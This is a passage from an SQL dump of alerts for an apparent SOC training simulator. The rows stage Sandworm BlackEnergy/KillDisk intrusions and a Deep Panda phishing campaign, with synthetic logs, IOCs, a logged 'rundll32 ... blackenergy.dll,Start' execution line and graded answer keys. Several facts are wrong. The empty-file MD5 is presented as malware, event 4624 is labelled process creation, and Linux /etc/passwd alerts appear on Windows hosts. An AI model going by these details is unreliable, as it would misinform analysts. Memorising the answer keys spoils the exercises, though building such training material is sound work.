Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.427Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch.\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T14:52:30Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"event_type\\\":\\\"Process Creation\\\",\\\"host\\\":\\\"compromised-host\\\",\\\"source_ip\\\":\\\"93.184.216.34\\\",\\\"destination_ip\\\":\\\"10.0.5.23\\\",\\\"user\\\":\\\"SYSTEM\\\",\\\"process_name\\\":\\\"C:\\\\\\\\Windows\\\\\\\\system32\\\\\\\\rundll32.exe\\\",\\\"command_line\\\":\\\"rundll32.exe C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\blackenergy.dll,Start\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"blackenergy.dll\\\",\\\"user_id\\\":\\\"S-1-5-18\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.427Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. 
[Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T14:52:30Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"event_type\\\":\\\"Process Creation\\\",\\\"host\\\":\\\"compromised-host\\\",\\\"source_ip\\\":\\\"93.184.216.34\\\",\\\"destination_ip\\\":\\\"10.0.5.23\\\",\\\"user\\\":\\\"SYSTEM\\\",\\\"process_name\\\":\\\"C:\\\\\\\\Windows\\\\\\\\system32\\\\\\\\rundll32.exe\\\",\\\"command_line\\\":\\\"rundll32.exe C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\blackenergy.dll,Start\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"blackenergy.dll\\\",\\\"user_id\\\":\\\"S-1-5-18\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.427Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T14:52:30Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"event_type\\\":\\\"Process Creation\\\",\\\"host\\\":\\\"compromised-host\\\",\\\"source_ip\\\":\\\"93.184.216.34\\\",\\\"destination_ip\\\":\\\"10.0.5.23\\\",\\\"user\\\":\\\"SYSTEM\\\",\\\"process_name\\\":\\\"C:\\\\\\\\Windows\\\\\\\\system32\\\\\\\\rundll32.exe\\\",\\\"command_line\\\":\\\"rundll32.exe C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\blackenergy.dll,Start\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"blackenergy.dll\\\",\\\"user_id\\\":\\\"S-1-5-18\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.427Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. 
[Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T14:52:30Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"event_type\\\":\\\"Process Creation\\\",\\\"host\\\":\\\"compromised-host\\\",\\\"source_ip\\\":\\\"93.184.216.34\\\",\\\"destination_ip\\\":\\\"10.0.5.23\\\",\\\"user\\\":\\\"SYSTEM\\\",\\\"process_name\\\":\\\"C:\\\\\\\\Windows\\\\\\\\system32\\\\\\\\rundll32.exe\\\",\\\"command_line\\\":\\\"rundll32.exe C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\blackenergy.dll,Start\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"blackenergy.dll\\\",\\\"user_id\\\":\\\"S-1-5-18\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.427Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T14:52:30Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"event_type\\\":\\\"Process Creation\\\",\\\"host\\\":\\\"compromised-host\\\",\\\"source_ip\\\":\\\"93.184.216.34\\\",\\\"destination_ip\\\":\\\"10.0.5.23\\\",\\\"user\\\":\\\"SYSTEM\\\",\\\"process_name\\\":\\\"C:\\\\\\\\Windows\\\\\\\\system32\\\\\\\\rundll32.exe\\\",\\\"command_line\\\":\\\"rundll32.exe C:\\\\\\\\Users\\\\\\\\Public\\\\\\\\blackenergy.dll,Start\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"blackenergy.dll\\\",\\\"user_id\\\":\\\"S-1-5-18\\\"}\"}],\"query\":\"index=main source=\\\"/var/ossec/logs/alerts/alerts.json\\\" | head 100\"}}', 0),
(781, 'Persistence through Credential Dumping', 'critical', 'Memory forensics and user account monitoring', 'To ensure continued access, Sandworm used BlackEnergy to dump credentials from infected machines, allowing them to escalate privileges and deepen their control.', 'Credential Access', 'T1003.001', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-15T13:45:23Z\",\"event_id\":\"4624\",\"system\":{\"hostname\":\"compromised-host\",\"internal_ip\":\"192.168.1.45\",\"os\":\"Windows Server 2016\"},\"user\":{\"username\":\"admin_user\",\"domain\":\"CORPDOMAIN\"},\"process\":{\"name\":\"lsass.exe\",\"pid\":1040,\"command_line\":\"C:\\\\Windows\\\\system32\\\\lsass.exe\"},\"malware\":{\"name\":\"BlackEnergy\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\"},\"network\":{\"source_ip\":\"192.168.1.45\",\"destination_ip\":\"185.92.220.25\",\"protocol\":\"TCP\",\"port\":445},\"files\":[{\"filename\":\"dumped_creds.dmp\",\"path\":\"C:\\\\Windows\\\\Temp\\\\dumped_creds.dmp\"}]}', '2026-01-11 23:37:37', '2026-02-16 18:01:00', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_logs\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised host\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"185.92.220.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel\",\"verdict\":\"malicious\",\"details\":\"Known command and control server\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_database\",\"verdict\":\"malicious\",\"details\":\"BlackEnergy malware hash\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"dumped_creds.dmp\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_logs\",\"verdict\":\"suspicious\",\"details\":\"Credential dump 
file\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.429Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T13:45:23Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"system\\\":{\\\"hostname\\\":\\\"compromised-host\\\",\\\"internal_ip\\\":\\\"192.168.1.45\\\",\\\"os\\\":\\\"Windows Server 2016\\\"},\\\"user\\\":{\\\"username\\\":\\\"admin_user\\\",\\\"domain\\\":\\\"CORPDOMAIN\\\"},\\\"process\\\":{\\\"name\\\":\\\"lsass.exe\\\",\\\"pid\\\":1040,\\\"command_line\\\":\\\"C:\\\\\\\\Windows\\\\\\\\system32\\\\\\\\lsass.exe\\\"},\\\"malware\\\":{\\\"name\\\":\\\"BlackEnergy\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"},\\\"network\\\":{\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"185.92.220.25\\\",\\\"protocol\\\":\\\"TCP\\\",\\\"port\\\":445},\\\"files\\\":[{\\\"filename\\\":\\\"dumped_creds.dmp\\\",\\\"path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\Temp\\\\\\\\dumped_creds.dmp\\\"}]}\"},{\"timestamp\":\"2026-02-01T20:31:22.429Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T13:45:23Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"system\\\":{\\\"hostname\\\":\\\"compromised-host\\\",\\\"internal_ip\\\":\\\"192.168.1.45\\\",\\\"os\\\":\\\"Windows Server 
2016\\\"},\\\"user\\\":{\\\"username\\\":\\\"admin_user\\\",\\\"domain\\\":\\\"CORPDOMAIN\\\"},\\\"process\\\":{\\\"name\\\":\\\"lsass.exe\\\",\\\"pid\\\":1040,\\\"command_line\\\":\\\"C:\\\\\\\\Windows\\\\\\\\system32\\\\\\\\lsass.exe\\\"},\\\"malware\\\":{\\\"name\\\":\\\"BlackEnergy\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"},\\\"network\\\":{\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"185.92.220.25\\\",\\\"protocol\\\":\\\"TCP\\\",\\\"port\\\":445},\\\"files\\\":[{\\\"filename\\\":\\\"dumped_creds.dmp\\\",\\\"path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\Temp\\\\\\\\dumped_creds.dmp\\\"}]}\"},{\"timestamp\":\"2026-02-01T20:30:22.429Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T13:45:23Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"system\\\":{\\\"hostname\\\":\\\"compromised-host\\\",\\\"internal_ip\\\":\\\"192.168.1.45\\\",\\\"os\\\":\\\"Windows Server 2016\\\"},\\\"user\\\":{\\\"username\\\":\\\"admin_user\\\",\\\"domain\\\":\\\"CORPDOMAIN\\\"},\\\"process\\\":{\\\"name\\\":\\\"lsass.exe\\\",\\\"pid\\\":1040,\\\"command_line\\\":\\\"C:\\\\\\\\Windows\\\\\\\\system32\\\\\\\\lsass.exe\\\"},\\\"malware\\\":{\\\"name\\\":\\\"BlackEnergy\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"},\\\"network\\\":{\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"185.92.220.25\\\",\\\"protocol\\\":\\\"TCP\\\",\\\"port\\\":445},\\\"files\\\":[{\\\"filename\\\":\\\"dumped_creds.dmp\\\",\\\"path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\Temp\\\\\\\\dumped_creds.dmp\\\"}]}\"},{\"timestamp\":\"2026-02-01T20:29:22.429Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T13:45:23Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"system\\\":{\\\"hostname\\\":\\\"compromised-host\\\",\\\"internal_ip\\\":\\\"192.168.1.45\\\",\\\"os\\\":\\\"Windows Server 2016\\\"},\\\"user\\\":{\\\"username\\\":\\\"admin_user\\\",\\\"domain\\\":\\\"CORPDOMAIN\\\"},\\\"process\\\":{\\\"name\\\":\\\"lsass.exe\\\",\\\"pid\\\":1040,\\\"command_line\\\":\\\"C:\\\\\\\\Windows\\\\\\\\system32\\\\\\\\lsass.exe\\\"},\\\"malware\\\":{\\\"name\\\":\\\"BlackEnergy\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"},\\\"network\\\":{\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"185.92.220.25\\\",\\\"protocol\\\":\\\"TCP\\\",\\\"port\\\":445},\\\"files\\\":[{\\\"filename\\\":\\\"dumped_creds.dmp\\\",\\\"path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\Temp\\\\\\\\dumped_creds.dmp\\\"}]}\"},{\"timestamp\":\"2026-02-01T20:28:22.429Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T13:45:23Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"system\\\":{\\\"hostname\\\":\\\"compromised-host\\\",\\\"internal_ip\\\":\\\"192.168.1.45\\\",\\\"os\\\":\\\"Windows Server 2016\\\"},\\\"user\\\":{\\\"username\\\":\\\"admin_user\\\",\\\"domain\\\":\\\"CORPDOMAIN\\\"},\\\"process\\\":{\\\"name\\\":\\\"lsass.exe\\\",\\\"pid\\\":1040,\\\"command_line\\\":\\\"C:\\\\\\\\Windows\\\\\\\\system32\\\\\\\\lsass.exe\\\"},\\\"malware\\\":{\\\"name\\\":\\\"BlackEnergy\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"},\\\"network\\\":{\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"185.92.220.25\\\",\\\"protocol\\\":\\\"TCP\\\",\\\"port\\\":445},\\\"files\\\":[{\\\"filename\\\":\\\"dumped_creds.dmp\\\",\\\"path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\Temp\\\\\\\\dumped_creds.dmp\\\"}]}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 
100\"}}', 0),
(782, 'Lateral Movement to SCADA Systems', 'critical', 'Network traffic analysis', 'With elevated privileges, Sandworm moved laterally across the network to access SCADA systems, setting the stage for the eventual power disruption.', 'Lateral Movement', 'T1570 - Lateral Tool Transfer', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-15T14:32:17Z\",\"source_ip\":\"192.168.1.105\",\"destination_ip\":\"10.0.0.50\",\"external_ip\":\"203.0.113.45\",\"username\":\"j.doe\",\"accessed_system\":\"SCADA-Controller-01\",\"malware_filename\":\"olympic_destroyer.exe\",\"malware_hash\":\"3f5d1e7ccb4e7c8b8e77d8f7fbcf4f0d\",\"event\":\"Lateral movement detected\",\"protocol\":\"SMB\",\"action\":\"Access to SCADA systems\"}', '2026-01-11 23:37:37', '2026-02-16 18:01:08', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Critical SCADA system IP\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"public\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with Sandworm activity\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"olympic_destroyer.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_database\",\"verdict\":\"malicious\",\"details\":\"Olympic Destroyer malware variant\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"3f5d1e7ccb4e7c8b8e77d8f7fbcf4f0d\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_database\",\"verdict\":\"malicious\",\"details\":\"Olympic Destroyer malware 
hash\"}},{\"id\":\"artifact_6\",\"type\":\"username\",\"value\":\"j.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Legitimate user account\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(783, 'Deployment of KillDisk Wiper', 'critical', 'Disk forensics', 'In the final stage, Sandworm deployed KillDisk, a destructive wiper, on targeted systems. This attack erased crucial data, complicating recovery and prolonging the blackout.', 'Destructive Attack', 'T1485 - Data Destruction', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-15T14:23:32Z\",\"event_id\":\"wiper-attack-001\",\"source_ip\":\"185.92.220.45\",\"destination_ip\":\"192.168.1.45\",\"hash\":\"2b8c8f8fd1b3f1a9b58c8d8a1b2f3a9f\",\"file_name\":\"killdisk.exe\",\"user_account\":\"admin_sandworm\",\"action\":\"file_deletion\",\"status\":\"success\",\"description\":\"KillDisk wiper executed and erased data on the targeted system.\"}', '2026-01-11 23:37:37', '2026-02-16 18:01:43', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.92.220.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with Sandworm operations.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP of the compromised host.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"2b8c8f8fd1b3f1a9b58c8d8a1b2f3a9f\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with KillDisk malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"killdisk.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"malicious\",\"details\":\"Executable file used for data wiping.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"admin_sandworm\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Logs\",\"verdict\":\"suspicious\",\"details\":\"User account potentially compromised by 
Sandworm.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.431Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:32Z\\\",\\\"event_id\\\":\\\"wiper-attack-001\\\",\\\"source_ip\\\":\\\"185.92.220.45\\\",\\\"destination_ip\\\":\\\"192.168.1.45\\\",\\\"hash\\\":\\\"2b8c8f8fd1b3f1a9b58c8d8a1b2f3a9f\\\",\\\"file_name\\\":\\\"killdisk.exe\\\",\\\"user_account\\\":\\\"admin_sandworm\\\",\\\"action\\\":\\\"file_deletion\\\",\\\"status\\\":\\\"success\\\",\\\"description\\\":\\\"KillDisk wiper executed and erased data on the targeted system.\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.431Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:32Z\\\",\\\"event_id\\\":\\\"wiper-attack-001\\\",\\\"source_ip\\\":\\\"185.92.220.45\\\",\\\"destination_ip\\\":\\\"192.168.1.45\\\",\\\"hash\\\":\\\"2b8c8f8fd1b3f1a9b58c8d8a1b2f3a9f\\\",\\\"file_name\\\":\\\"killdisk.exe\\\",\\\"user_account\\\":\\\"admin_sandworm\\\",\\\"action\\\":\\\"file_deletion\\\",\\\"status\\\":\\\"success\\\",\\\"description\\\":\\\"KillDisk wiper executed and erased data on the targeted system.\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.431Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:32Z\\\",\\\"event_id\\\":\\\"wiper-attack-001\\\",\\\"source_ip\\\":\\\"185.92.220.45\\\",\\\"destination_ip\\\":\\\"192.168.1.45\\\",\\\"hash\\\":\\\"2b8c8f8fd1b3f1a9b58c8d8a1b2f3a9f\\\",\\\"file_name\\\":\\\"killdisk.exe\\\",\\\"user_account\\\":\\\"admin_sandworm\\\",\\\"action\\\":\\\"file_deletion\\\",\\\"status\\\":\\\"success\\\",\\\"description\\\":\\\"KillDisk wiper executed and erased data on the targeted system.\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.431Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:32Z\\\",\\\"event_id\\\":\\\"wiper-attack-001\\\",\\\"source_ip\\\":\\\"185.92.220.45\\\",\\\"destination_ip\\\":\\\"192.168.1.45\\\",\\\"hash\\\":\\\"2b8c8f8fd1b3f1a9b58c8d8a1b2f3a9f\\\",\\\"file_name\\\":\\\"killdisk.exe\\\",\\\"user_account\\\":\\\"admin_sandworm\\\",\\\"action\\\":\\\"file_deletion\\\",\\\"status\\\":\\\"success\\\",\\\"description\\\":\\\"KillDisk wiper executed and erased data on the targeted system.\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.431Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:32Z\\\",\\\"event_id\\\":\\\"wiper-attack-001\\\",\\\"source_ip\\\":\\\"185.92.220.45\\\",\\\"destination_ip\\\":\\\"192.168.1.45\\\",\\\"hash\\\":\\\"2b8c8f8fd1b3f1a9b58c8d8a1b2f3a9f\\\",\\\"file_name\\\":\\\"killdisk.exe\\\",\\\"user_account\\\":\\\"admin_sandworm\\\",\\\"action\\\":\\\"file_deletion\\\",\\\"status\\\":\\\"success\\\",\\\"description\\\":\\\"KillDisk wiper executed and erased data on the targeted system.\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(784, 'Phishing Campaign Detected', 'high', 'Email Gateway Logs', 'Deep Panda initiates the attack by sending spear-phishing emails to Anthem\'s IT administrators, aiming to harvest credentials and gain a foothold into the network.', 'Social Engineering', 'T1566.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:45Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.15\",\"email_subject\":\"Urgent: Account Verification Required\",\"sender_email\":\"support@anthen-security.com\",\"recipient_email\":\"admin@anthem.com\",\"attachment_name\":\"Invoice_Details.doc\",\"attachment_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"malicious_links\":[\"http://malicious-link.com/verify\"],\"attachment_action\":\"Downloaded\"}', '2026-01-11 23:42:29', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"malicious\",\"details\":\"Known phishing IP associated with APT campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal network IP\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"support@anthen-security.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"malicious\",\"details\":\"Spoofed email address used in phishing campaigns\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malicious document\"}},{\"id\":\"artifact_5\",\"type\":\"url\",\"value\":\"http://malicious-link.com/verify\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT 
Database\",\"verdict\":\"malicious\",\"details\":\"Phishing URL used to collect credentials\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Phishing Campaign Detected\",\"date\":\"2026-02-01T20:32:22.432Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(785, 'Suspicious Execution of Derusbi Malware', 'high', 'Endpoint Detection and Response (EDR) System', 'The EDR system detected the execution of the Derusbi malware on an internal endpoint. This activity follows a successful credential harvesting attempt. The malware is known for establishing persistence and conducting reconnaissance.', 'Malware Execution', 'T1059 - Command and Scripting Interpreter', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T08:45:12Z\",\"event_id\":\"12345\",\"hostname\":\"compromised-host.internal\",\"username\":\"jdoe\",\"src_ip\":\"192.168.1.15\",\"external_ip\":\"203.0.113.45\",\"malware_name\":\"Derusbi\",\"file_path\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\derusbi.exe\",\"file_hash\":\"a7b9c3d4e5f67890123456789abcdef1234567890123456789abcdef12345678\",\"process_id\":5432,\"command_line\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\derusbi.exe\",\"behavior\":\"Persistence Mechanism\",\"network_activity\":{\"destination_ip\":\"203.0.113.45\",\"destination_port\":443}}', '2026-01-11 23:42:29', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known C2 server associated with APT 